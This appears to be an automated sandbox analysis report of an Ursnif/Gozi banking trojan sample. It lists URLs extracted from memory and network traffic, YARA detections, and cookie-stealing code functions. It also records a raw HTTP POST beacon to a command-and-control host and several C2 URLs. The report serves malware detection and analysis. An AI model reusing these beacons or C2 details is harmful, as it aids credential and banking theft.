Source: de-ch[1].htm.4.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: unknown

HTTP traffic detected: POST /api1/U2cJFG4d72Sw1/coZoTMXb/lP1gviHXrIHWsvunsGl6cnc/P0V_2BL3fj/46b0n6i8fucqBFlqF/hcagnGa1TbpS/dgul3xzYijV/L8f_2B7T21euzh/9_2ByVhlbD4q5WftmVdrM/zBjLhgYQ1PYM0cHh/x5hh2ZDx_2FdFJL/wYla_2Frk0rvM65swQ/cH6PtCte0/lwimgIOiQ_2Fctv6niAP/fIjCPduuWdUdoTOKkQg/18uc85TvLrI_2BdUpjqsJC/iPMSa8oRiSqUF/LVEeH34R/iuq5fk_2BzVlr4Uczzgpoea/kUr98o_2Bs/jBUez8HK/7Gj8QOr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Jan 2021 18:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: {0631AB9B-6052-11EB-90E6-ECF4BB82F7E0}.dat.3.dr, ~DFC755D5147CF6BDD9.TMP.3.dr	String found in binary or memory: http://api10.laptok.at/api1/fMoOyVtNHyb2CKT5h4Jv/cOtoUxpSs_2B7b6ktW6/8gKDvU8GZHurEn2nukEHAM/mBRpHfez
Source: regsvr32.exe, 00000001.00000003.375956892.0000000002C40000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000003.376076963.0000000002C50000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav9297Yj0
Source: {1136F6F8-6052-11EB-90E6-ECF4BB82F7E0}.dat.3.dr	String found in binary or memory: http://api10.laptok.at/api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yE
Source: {0631AB9D-6052-11EB-90E6-ECF4BB82F7E0}.dat.3.dr, ~DFBBE82018C43F3C1D.TMP.3.dr	String found in binary or memory: http://api10.laptok.at/api1/zu_2FE7OgtG1YElZCJHzk/3Z6oZ2v_2FSvhdpl/3dtqOsJj6Y7KZxP/RohYJ_2FHTGS4WhMs
Source: regsvr32.exe, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001D.00000003.445362974.00000233EF2C7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: auction[1].htm.4.dr	String found in binary or memory: http://popup.taboola.com/german
Source: powershell.exe, 0000001D.00000002.446586798.0000023380001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.3.dr	String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.3.dr	String found in binary or memory: http://www.google.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.3.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.3.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.3.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.3.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.3.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.3.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1611686651&rver
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1611686651&rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1611686652&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1611686651&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d6YmM.img?h=368&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch&ued=https%
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49740 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_02B75ECA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_02B75ECA
